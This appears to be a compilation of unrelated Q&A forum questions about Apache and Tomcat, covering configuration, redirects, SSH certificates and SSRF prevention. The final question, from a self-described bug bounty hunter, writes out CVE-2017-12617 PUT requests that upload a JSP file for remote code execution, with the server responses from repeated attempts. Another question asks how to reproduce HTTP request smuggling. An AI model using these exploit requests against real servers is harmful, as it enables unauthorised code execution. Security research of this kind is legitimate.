Running PHP echo $_SERVER [‘DOCUMENT_ROOT’]; Shows Apache Default Path

Trying to get set up and running on a new hosting company after the old one announced they are discontinuing their service at the end of the year, I am having difficulty getting the sites to run. I narrowed it down to Apache’s DocumentRoot for each domain showing the Apache default path rather than showing the path to the individual site’s file location. In other words, when I run echo $ _SERVER ['DOCUMENT_ROOT']; in a test script, it shows the path as /etc/apache2/htdocs when it should show /home/username/public_html/domain.com. They seem unable to fix it so can DocumentRoot be changed through cPanel for each domain?

Apache redirect .com.ar to .com

we have a website with 2 different domains:

www.example.com or example.com

and www.example.com.ar or example.com.ar

I want all requests redirected to www.example.com.

I know I have to create two virtual hosts in Apache and in the .htaccess file for .com.ar site put the rewrite rule (as explained here I have domain.com and domain.org to the same site, should I use redirects to avoid duplicate content)

My question is: we have a wildcard SSL certificate for .com domain. Is it possible to redirect HTTPS requests for www.example.com.ar and example.com.ar to the .com site? Or I should get another SSL certificate for .com.ar domain?

Protect password from apache user by making file executable-only

I (will) have a binary executable file. It’s only permission is user-execute. It cannot be read by user, group, or world. The owner of the file is the Apache user. I don’t want the apache user to be able to read the file, but I do want the apache user (via a PHP script) to be able to execute the file.

The binary executable file contains a password that is used to decrypt an SSH private key file, as I need the public key to hash the request body & compare against a hashed signature my server is receiving. The executable binary file will receive the request body & hashed signature, do its stuff, and simply return "yes" or "no" to indicate if the request is valid.

I know my executable binary file could still be accessed by root or sudo. Preventing that would be interesting, but is beyond the scope of my question.

Would this be an effective way to protect the password (which is in the binary file that can ONLY be executed) against PHP scripts running under the apache user?

Note: I would like to open-source this setup so want it to be useable on a variety of linux servers. I’m personally on a shared-server so can’t really configure apache or the system, and that would be my target audience.

Remove Apache Tomcat on Debian to use Jetty sever

I’m a beginner on linux, and I would like to install a wiki software on a server, a virtual machine with debian 10.

First I began to follow the tutorial 1 to install Bluespice 3, a wiki sofware, the Apach part is ok, then Jetty. Afterthat I installed Apache Tomcat 9 with the help of another tutorial, tutorial 2. Then I realized jetty has the same functionnallity (Tomcat 9) and prefered by tutorial 1.

To get to the point, I want to delete Apache Tomcat to prioritize jetty, and to keep following the tutorial 1. But I didn’t install Tomcat 9 via the command line "apt-get install….", but via the extraction of tar.gz file, with the creation of Tomcat group… so i do not know the exact package names of tomcat 9 to remove its properly. Is there a specific package property of tomcat 9 to remove its properly?

Otherwise, maybe an other solution. When I type in the web browser http://localhost:8080, the web page is 404 error with the message: "the origin of the server did not find a current representation for the target ressource or is not willing to disclose that one exits". In the left bottom, it’s written "Apache Tomcat/9.0.37. I think Tomcat has the priority. But in this case I would like the html page of Bluespice3, knowing the Bluespice war file is at the right location in /var/lib/jetty9/webapps Can I modify the path between localhost and server to give the priority at jetty, without removing tomcat? Is it possible?

Thanks in advance for your help*

Force Apache Server/Tomcat to ignore Transfer-Encoding

I am trying to reproduce HTTP request smuggling using an Apache HTTP Server as a reverse proxy (using mod_proxy) and a Tomcat Server in the back-end.

Is it possible to force either Apache Server or Tomcat to ignore Transfer-Encoding in requests (and only use Content-Length)? Or is request smuggling simply not possible with this configuration?

Using apache mina for ssh using signed ssh-rsa-cert-01 from Certification Authority

There is an existing client configured and running (SshClient) using apache mina to ssh to one of our internal jump boxes. It currently uses PEM based authentication. Due to compliance we have to switch to using internally signed certificates (internally we are using hashicorp vault as a CA). I’m unable to find any documentation regarding how to use signed certificates for ssh in apache mina to start with. Is it not supported? Will I perhaps have to use any other java ssh library?

Kafka source code on github and from the apache website is missing the “org.apache.kafka.common.message.” package? [closed]

I tried downloading the source code of Kafka from Github as well as from Apache’s website. I found that both the sources were missing the “org.apache.kafka.common.message.” package. Can anybody kindly let me know why this might be the case.

Kindly note that I had downloaded the source of “AK RELEASE 2.5.0” from Apache’s website. Similarly I used “trunk” branch from the current github repository for kafka.

What measures can I take to prevent Server Side Request Forgery (SSRF) in a JAX-RS Application running on Apache Tomcat?

If I have a an application server that uses an implementation of JAX-RS, and is running as *.war file on an Apache Tomcat server, is there anything special that needs to be done or configured to prevent SSRF attacks?

My naive understanding is that JAX-RS application are only serving requests to certain URLs and Apache Tomcat only allows requests to certain resources.

If this is handled by default by JAX-RS or Apache Tomcat, could you explain how?

If this is not handled by default by JAX-RS nor Apache Tomcat, could you explain the best way to prevent this type of attack with these tools?

Specific versions:

  • JAX-RS api 2.1
  • Apache Tomcat 9.0.33

Vulnerable Apache Tomcat server

I am a bug bounty hunter. When doing some research, I found a subdomain that is using Apache Tomcat. Talk about Tomcat, there was a vulnerability found in 2017: CVE-2017-12617.

Any Apache Tomcat server with enabled PUT request method will allow the attacker to create a JSP file in the server through a crafted request and will lead to RCE:

PUT /1.jsp/ HTTP/1.1 Host: vulnerable.com Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Referer: http://vulnerable.com/public/ Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.8,zh-CN;q=0.6,zh;q=0.4,zh-TW;q=0.2 Cookie: JSESSIONID=A27674F21B3308B4D893205FD2E2BF94 Connection: close Content-Length: 26  <% out.println("hello");%> 

And after some testing, I found that the server enabled the PUT method. But when I sent the exploit request, there is an error:

PUT /1.jsp/ HTTP/1.1 Host: vulnerable.com Connection: close Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 Sec-Fetch-Dest: document Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9,vi;q=0.8 Cookie: ... If-Modified-Since: Thu, 09 Apr 2020 08:10:10 GMT Content-Type: application/x-www-form-urlencoded Content-Length: 26  <% out.println("hello");%>     HTTP/1.1 500 Internal Server Error Server: Apache-Coyote/1.1 Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 389 Date: Fri, 17 Apr 2020 02:07:24 GMT Connection: close  <html><body><h1>Whitelabel Error Page</h1><p>This application has no explicit mapping for /error, so you are seeing this as a fallback.</p><div id='created'>Fri Apr 17 11:07:24 JST 2020</div><div>There was an unexpected error (type=Internal Server Error, status=500).</div><div>URLDecoder: Illegal hex characters in escape (%) pattern - For input string: &quot; o&quot;</div></body></html> 

I found that the error is from the Java URLDecoder. The server may has decoded the content in the body of the request, but the % o is not a valid URL character, so the error turns out. It proves that the server has handled the request, it may works but not. Then I try this:

PUT /1.jsp/ HTTP/1.1 Host: vulnerable.com Connection: close Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 Sec-Fetch-Dest: document Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9,vi;q=0.8 Cookie: ... If-Modified-Since: Thu, 09 Apr 2020 08:10:10 GMT Content-Type: application/x-www-form-urlencoded Content-Length: 26  <%25 out.println("hello");%25>     HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Date: Fri, 17 Apr 2020 02:05:30 GMT Connection: close Content-Length: 1295  <!DOCTYPE html> <!--   ~ Copyright (c) 2018 Vulnerable Corporation. All rights reserved.   ~ Vulnerable Corporation PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.   -->  <html> <head>   <title>VULNEARBLE</title> ... 

It gave me back a 404 response. I have tried the POST but it just proves that there is a special thing in the PUT method:

POST /1.jsp/ HTTP/1.1 Host: vulnerable.com Connection: close Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 Sec-Fetch-Dest: document Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9,vi;q=0.8 Cookie: ... If-Modified-Since: Thu, 09 Apr 2020 08:10:10 GMT Content-Type: application/x-www-form-urlencoded Content-Length: 26  <% out.println("hello");%>     HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Date: Fri, 17 Apr 2020 02:05:30 GMT Connection: close Content-Length: 1295  <!DOCTYPE html> <!--   ~ Copyright (c) 2018 Vulnerable Corporation. All rights reserved.   ~ Vulnerable Corporation PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.   -->  <html> <head>   <title>VULNEARBLE</title> ... 

(The POST request even does not appear any error or response). I have checked the 1.jsp file but it hasn’t been created yet:

GET /1.jsp/ HTTP/1.1 Host: vulnerable.com Connection: close Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 Sec-Fetch-Dest: document Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9,vi;q=0.8 Cookie: ... If-Modified-Since: Thu, 09 Apr 2020 08:10:10 GMT Content-Type: application/x-www-form-urlencoded Content-Length: 26     HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Date: Fri, 17 Apr 2020 02:05:30 GMT Connection: close Content-Length: 1295  <!DOCTYPE html> <!--   ~ Copyright (c) 2018 Vulnerable Corporation. All rights reserved.   ~ Vulnerable Corporation PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.   -->  <html> <head>   <title>VULNEARBLE</title> ... 

Does anyone know what is happens and what should I do next?